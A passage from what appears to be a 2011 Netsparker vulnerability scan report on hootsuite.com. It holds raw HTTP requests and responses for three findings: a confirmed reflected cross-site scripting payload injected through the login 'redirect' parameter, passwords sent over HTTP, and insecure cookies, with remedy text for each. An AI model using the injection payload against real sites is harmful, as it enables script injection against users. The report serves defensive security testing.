Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 
'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
- /login
/login
CONFIRMED
Parameters
Parameter
Type
Value
loginInfo%5Bemail%5D
POST
netsparker@example.com
loginInfo%5Bpassword%5D
POST
3
loginInfo%5BrememberMe%5D
POST
on
redirect
POST
'"--></style></script><script>alert(0x000A2D)</script>
form_submit
POST
Login
Request
POST /login HTTP/1.1 Referer: http://hootsuite.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: hootsuite.com Cookie: _SID=34a0f858bab3c6abbb550a36dfd8e5ea04ac805e; signup_plan_id=2 Content-Length: 213 Accept-Encoding: gzip, deflate loginInfo%5Bemail%5D=netsparker%40example.com&loginInfo%5Bpassword%5D=3&loginInfo%5BrememberMe%5D=on&redirect='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A2D)%3c%2fscript%3e&form_submit=Login
Response
HTTP/1.1 200 OK Server: HootSuite Server v1.1 Date: Tue, 01 Mar 2011 13:25:39 GMT Content-Type: text/html Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Gridnum: 18 Vary: Accept-Encoding Content-Encoding: Content-Length: 4278 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." 
/> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript"> var hs = hs || {}; hs.timers = new Object(); hs.prefs = new Object(); hs.c = new Object(); hs.c.rootUrl = "http://hootsuite.com"; hs.c.rootUrlSSL = "https://hootsuite.com"; hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images"; hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf"; hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js"; hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production"; hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? 
hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/'; hs.c.tweetPageSize = 30; hs.prefs.language = ''; hs.timezoneOffset=null; hs.memberId=null; hs.socialNetworks=[]; hs.socialNetworksKeyedByType=[]; hs.memberAutoInitial=""; hs.prefs.isNotifyNewTweet=0; hs.prefs.isNewRetweet = 0; hs.prefs.theme = ''; hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB hs.languagePack = {}; hs.gp = 0; hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe"; hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm"; hs.fbFanpageId="177463958820"; </script> <script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script> <div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div class="errorMessage global-message rb-a-4" id="flashMessage_Error"> <a class="icon-19 close" onclick="fadeSlideRemove($('#flashMessage_Error')); return false;">Close</a> <h3>Error</h3> <strong>There are errors, please check the message below.</strong> </div> <div id="content"> <div class="primary login rb-a-5"> <div class="title"> <h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1> <h2>Login</h2> </div> <div class="section"> <div id="loginBox" class="rb-a-4"> <div id="openId"> <script type="text/javascript"> $().ready(function() { openid.init('openid_identifier'); }); </script> <form id="openid_form" action="https://hootsuite.com/openid-start" method="post" > <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x000A2D)</script>"/> <div id="openid_choice" style="display: block; "> <h3>Login or Signup with OpenID</h3> <p>Select one of these third-party accounts:</p> <div id="openid_btns"></div> </div> <div id="openid_input_area"></div> </form> </div> <div id="secureId"> <form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, 
'_submitLogin');" action="https://hootsuite.com/login"> <label for="email" class="title">Email:</label> <input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" /> <p class="formError">The supplied email can not be found</p> <label for="password" class="title">Password:</label> <input id="password" type="password" name="loginInfo[password]" maxlength="100" /> <p class="formError"></p> <p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p> <p class="remember"> <label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked /> Remember me</label> </p> <div class="btns"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a> </div> <div class="info"> Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a> </div> <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x000A2D)</script>" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> </div> </div> </div> </div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.2069 | 0.0126 | 6.1% | 1">©2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script 
type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. 
Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 
'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
Password Transmitted Over HTTP
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
See the remedy for the solution.
Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /mobile/member/login
/mobile/member/login
CONFIRMED
http://hootsuite.com/mobile/member/login
Request
GET /mobile/member/login HTTP/1.1 Referer: http://hootsuite.com/mobile/index User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hootsuite.com Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; signup_plan_id=2 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: HootSuite Server v1.1 Date: Tue, 01 Mar 2011 13:23:05 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Gridnum: 29 Vary: Accept-Encoding Content-Encoding: Content-Length: 1419 <html> <head> <meta content='text/html; charset=Shift_JIS' http-equiv='Content-Type'> <title> HootSuite </title> </meta> </head> <body> <a href='/mobile/index'> <img id='top' name='top' src='http://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/mobile/jp/hs_logo.png' /> </a> <br /> <!--<p>Welcome to the Keitai version of HootSuite -- your social media dashboard.</p><p>Manage and update your Twitter and mixi accounts from one location using HootSuite. Save multiple custom searches to your account and view them easily from your phone. More social networks and features coming soon.</p><p>Also check out http://hootsuite.com from your computer to see our additional web-only features. 
Apps are also available for <a href='http://hootsuite.com/iphone'>iPhone</a> and <a href='http://hootsuite.com/android'>Android</a>.</p>--><p> HootSuite [undecodable Shift_JIS text]!</p><p> HootSuite [undecodable Shift_JIS text] Twitter [undecodable Shift_JIS text] mixi [undecodable Shift_JIS text]</p><p> [undecodable Shift_JIS text] http://hootsuite.com [undecodable Shift_JIS text] Web [undecodable Shift_JIS text] <a href='http://hootsuite.com/iphone'>iPhone</a> [undecodable Shift_JIS text] <a href='http://hootsuite.com/android'>Android</a> [undecodable Shift_JIS text]</p><br /><table cellpadding='5' cellspacing='0' width='100%'> <tr> <td bgcolor='#dddddd'> [undecodable Shift_JIS text] </td> </tr></table><form action='http://hootsuite.com/mobile/member/login' formtype='input' id='memberLoginForm' method='post' name='memberLoginForm'> [undecodable Shift_JIS text] <font color='#ff0000'> </font> <br /> <input id='email' maxlength='100' mode='alphabet' name='loginInfo[email]' type='text' value='' /> <br /> [undecodable Shift_JIS text] <font color='#ff0000'> </font> <br /> <input id='password' maxlength='100' name='loginInfo[password]' type='password' value='' /> <br /> <input name='form_submit' type='hidden' value='Login' /> <input type='submit' value='[undecodable Shift_JIS text]' /></form><a href='/mobile/member/signup'> [undecodable Shift_JIS text]</a><br /><br /><table cellpadding='5' cellspacing='0' width='100%'> <tr> <td bgcolor='#dddddd'> [undecodable Shift_JIS text] </td> </tr></table><ul> <li> <a href='http://www.google.co.jp/gwt/x?u=http://jp.hootsuite.com/entries/457415-bulk' target='_blank'> Bulk [undecodable Shift_JIS text] </a> </li> <li> <a href='http://www.google.co.jp/gwt/x?u=http://jp.hootsuite.com/entries/455464-facebook' target='_blank'> Facebook [undecodable Shift_JIS text] </a> </li> <li> <a href='http://www.google.co.jp/gwt/x?u=http://jp.hootsuite.com/entries/455453-page-pleasers-facebook' target='_blank'> Page Pleasers [undecodable Shift_JIS text] Facebook [undecodable Shift_JIS text] </a> </li> </ul> </body> <hr /> <center> <font color='#888888'> ©2010 HootSuite </font> </center></html>
Cookie Not Marked As Secure
A cookie that is transmitted over HTTPS was not marked as secure. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful MITM (man-in-the-middle) attack.
Impact
This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force the victim to make an HTTP request in order to steal the cookie.
Actions to Take
See the remedy for the solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2 and have physical access to systems, either as waypoints for the traffic or locally (having gained access to a system between the victim and the web server).
- /signup
/signup
CONFIRMED
signup_plan_id
Request
GET /signup?planId=2 HTTP/1.1 Referer: http://hootsuite.com/affiliate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hootsuite.com Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: HootSuite Server v1.1 Date: Tue, 01 Mar 2011 13:23:04 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: signup_plan_id=2; expires=Tue, 01-Mar-2011 14:23:04 GMT; path=/ X-Gridnum: 23 Vary: Accept-Encoding Content-Encoding: Content-Length: 10997 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." 
/> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript"> var hs = hs || {}; hs.timers = new Object(); hs.prefs = new Object(); hs.c = new Object(); hs.c.rootUrl = "http://hootsuite.com"; hs.c.rootUrlSSL = "https://hootsuite.com"; hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images"; hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf"; hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js"; hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production"; hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? 
hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/'; hs.c.tweetPageSize = 30; hs.prefs.language = ''; hs.timezoneOffset=null; hs.memberId=null; hs.socialNetworks=[]; hs.socialNetworksKeyedByType=[]; hs.memberAutoInitial=""; hs.prefs.isNotifyNewTweet=0; hs.prefs.isNewRetweet = 0; hs.prefs.theme = ''; hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB hs.languagePack = {}; hs.gp = 0; hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe"; hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm"; hs.fbFanpageId="177463958820"; </script> <script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script> <div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div id="content"> <div class="primary signup rb-a-5"> <div class="title"> <h1><a href="http://hootsuite.com">HootSuite - Social Media Dashboard</a></h1> <h2>Signup</h2> </div> <div class="section"> <div class="signupform rb-a-3"> <h2>Create Your Account</h2> <div> <span>Selected Plan: </span><span>Pro</span> ( $5.99 ) <a href="http://hootsuite.com/plans">Change</a> </div> <form name="memberSignupForm" id="memberSignupForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitSignup');" action="https://hootsuite.com/signup"> <input type="hidden" name="planId" value="2" /> <input type="hidden" name="owlyPro" value="" /> <label for="email" class="title">Email Address: <span class="required">*</span></label> <input id="email" type="text" name="member[email]" value="" maxlength="100" /> <div class="formError"></div> <label for="fullName" class="title">Full Name: <span class="required">*</span></label> <input id="fullName" type="text" name="member[fullName]" value="" maxlength="100" /> <div class="formError"></div> <label for="password" class="title">Password: <span class="required">*</span></label> <input id="password" 
type="password" name="member[password]" maxlength="100" /> <div class="formError"></div> <label for="confirmPassword" class="title">Confirm Password: <span class="required">*</span></label> <input id="confirmPassword" type="password" name="member[confirmPassword]" maxlength="100" /> <div style="display: ;"> <label for="timeZone" class="title">Time Zone: <span class="required">*</span></label> <div class="formError"></div> <select name="member[defaultTimezone]" id="timeZone"><option label="Select your local timezone...." value="none">Select your local timezone....</option><option label="US/Adak" value="America/Adak">US/Adak</option><option label="US/Anchorage" value="America/Anchorage">US/Anchorage</option><option label="US/Boise" value="America/Boise">US/Boise</option><option label="US/Chicago" value="America/Chicago" selected="selected">US/Chicago</option><option label="US/Denver" value="America/Denver">US/Denver</option><option label="US/Detroit" value="America/Detroit">US/Detroit</option><option label="US/Honolulu" value="Pacific/Honolulu">US/Honolulu</option><option label="US/Indiana/Indianapolis" value="America/Indiana/Indianapolis">US/Indiana/Indianapolis</option><option label="US/Indiana/Knox" value="America/Indiana/Knox">US/Indiana/Knox</option><option label="US/Indiana/Marengo" value="America/Indiana/Marengo">US/Indiana/Marengo</option><option label="US/Indiana/Petersburg" value="America/Indiana/Petersburg">US/Indiana/Petersburg</option><option label="US/Indiana/Tell_City" value="America/Indiana/Tell_City">US/Indiana/Tell_City</option><option label="US/Indiana/Vevay" value="America/Indiana/Vevay">US/Indiana/Vevay</option><option label="US/Indiana/Vincennes" value="America/Indiana/Vincennes">US/Indiana/Vincennes</option><option label="US/Indiana/Winamac" value="America/Indiana/Winamac">US/Indiana/Winamac</option><option label="US/Juneau" value="America/Juneau">US/Juneau</option><option label="US/Kentucky/Louisville" 
value="America/Kentucky/Louisville">US/Kentucky/Louisville</option><option label="US/Kentucky/Monticello" value="America/Kentucky/Monticello">US/Kentucky/Monticello</option><option label="US/Los_Angeles" value="America/Los_Angeles">US/Los_Angeles</option><option label="US/Menominee" value="America/Menominee">US/Menominee</option><option label="US/New_York" value="America/New_York">US/New_York</option><option label="US/Nome" value="America/Nome">US/Nome</option><option label="US/North_Dakota/Center" value="America/North_Dakota/Center">US/North_Dakota/Center</option><option label="US/North_Dakota/New_Salem" value="America/North_Dakota/New_Salem">US/North_Dakota/New_Salem</option><option label="US/Phoenix" value="America/Phoenix">US/Phoenix</option><option label="US/Shiprock" value="America/Shiprock">US/Shiprock</option><option label="US/Yakutat" value="America/Yakutat">US/Yakutat</option><option label="Canada/Atikokan" value="America/Atikokan">Canada/Atikokan</option><option label="Canada/Blanc-Sablon" value="America/Blanc-Sablon">Canada/Blanc-Sablon</option><option label="Canada/Cambridge_Bay" value="America/Cambridge_Bay">Canada/Cambridge_Bay</option><option label="Canada/Dawson" value="America/Dawson">Canada/Dawson</option><option label="Canada/Dawson_Creek" value="America/Dawson_Creek">Canada/Dawson_Creek</option><option label="Canada/Edmonton" value="America/Edmonton">Canada/Edmonton</option><option label="Canada/Glace_Bay" value="America/Glace_Bay">Canada/Glace_Bay</option><option label="Canada/Goose_Bay" value="America/Goose_Bay">Canada/Goose_Bay</option><option label="Canada/Halifax" value="America/Halifax">Canada/Halifax</option><option label="Canada/Inuvik" value="America/Inuvik">Canada/Inuvik</option><option label="Canada/Iqaluit" value="America/Iqaluit">Canada/Iqaluit</option><option label="Canada/Moncton" value="America/Moncton">Canada/Moncton</option><option label="Canada/Montreal" value="America/Montreal">Canada/Montreal</option><option 
label="Canada/Nipigon" value="America/Nipigon">Canada/Nipigon</option><option label="Canada/Pangnirtung" value="America/Pangnirtung">Canada/Pangnirtung</option><option label="Canada/Rainy_River" value="America/Rainy_River">Canada/Rainy_River</option><option label="Canada/Rankin_Inlet" value="America/Rankin_Inlet">Canada/Rankin_Inlet</option><option label="Canada/Regina" value="America/Regina">Canada/Regina</option><option label="Canada/Resolute" value="America/Resolute">Canada/Resolute</option><option label="Canada/St_Johns" value="America/St_Johns">Canada/St_Johns</option><option label="Canada/Swift_Current" value="America/Swift_Current">Canada/Swift_Current</option><option label="Canada/Thunder_Bay" value="America/Thunder_Bay">Canada/Thunder_Bay</option><option label="Canada/Toronto" value="America/Toronto">Canada/Toronto</option><option label="Canada/Vancouver" value="America/Vancouver">Canada/Vancouver</option><option label="Canada/Whitehorse" value="America/Whitehorse">Canada/Whitehorse</option><option label="Canada/Winnipeg" value="America/Winnipeg">Canada/Winnipeg</option><option label="Canada/Yellowknife" value="America/Yellowknife">Canada/Yellowknife</option><option label="(GMT-11) Pacific/Apia" value="Pacific/Apia">(GMT-11) Pacific/Apia</option><option label="(GMT-11) Pacific/Midway" value="Pacific/Midway">(GMT-11) Pacific/Midway</option><option label="(GMT-11) Pacific/Niue" value="Pacific/Niue">(GMT-11) Pacific/Niue</option><option label="(GMT-11) Pacific/Pago_Pago" value="Pacific/Pago_Pago">(GMT-11) Pacific/Pago_Pago</option><option label="(GMT-10) Pacific/Fakaofo" value="Pacific/Fakaofo">(GMT-10) Pacific/Fakaofo</option><option label="(GMT-10) Pacific/Johnston" value="Pacific/Johnston">(GMT-10) Pacific/Johnston</option><option label="(GMT-10) Pacific/Rarotonga" value="Pacific/Rarotonga">(GMT-10) Pacific/Rarotonga</option><option label="(GMT-10) Pacific/Tahiti" value="Pacific/Tahiti">(GMT-10) Pacific/Tahiti</option><option label="(GMT-9.5) 
Pacific/Marquesas" value="Pacific/Marquesas">(GMT-9.5) Pacific/Marquesas</option><option label="(GMT-9) Pacific/Gambier" value="Pacific/Gambier">(GMT-9) Pacific/Gambier</option><option label="(GMT-8) America/Santa_Isabel" value="America/Santa_Isabel">(GMT-8) America/Santa_Isabel</option><option label="(GMT-8) America/Tijuana" value="America/Tijuana">(GMT-8) America/Tijuana</option><option label="(GMT-8) Pacific/Pitcairn" value="Pacific/Pitcairn">(GMT-8) Pacific/Pitcairn</option><option label="(GMT-7) America/Chihuahua" value="America/Chihuahua">(GMT-7) America/Chihuahua</option><option label="(GMT-7) America/Hermosillo" value="America/Hermosillo">(GMT-7) America/Hermosillo</option><option label="(GMT-7) America/Mazatlan" value="America/Mazatlan">(GMT-7) America/Mazatlan</option><option label="(GMT-7) America/Ojinaga" value="America/Ojinaga">(GMT-7) America/Ojinaga</option><option label="(GMT-6) America/Belize" value="America/Belize">(GMT-6) America/Belize</option><option label="(GMT-6) America/Cancun" value="America/Cancun">(GMT-6) America/Cancun</option><option label="(GMT-6) America/Costa_Rica" value="America/Costa_Rica">(GMT-6) America/Costa_Rica</option><option label="(GMT-6) America/El_Salvador" value="America/El_Salvador">(GMT-6) America/El_Salvador</option><option label="(GMT-6) America/Guatemala" value="America/Guatemala">(GMT-6) America/Guatemala</option><option label="(GMT-6) America/Managua" value="America/Managua">(GMT-6) America/Managua</option><option label="(GMT-6) America/Matamoros" value="America/Matamoros">(GMT-6) America/Matamoros</option><option label="(GMT-6) America/Merida" value="America/Merida">(GMT-6) America/Merida</option><option label="(GMT-6) America/Mexico_City" value="America/Mexico_City">(GMT-6) America/Mexico_City</option><option label="(GMT-6) America/Monterrey" value="America/Monterrey">(GMT-6) America/Monterrey</option><option label="(GMT-6) America/Tegucigalpa" value="America/Tegucigalpa">(GMT-6) 
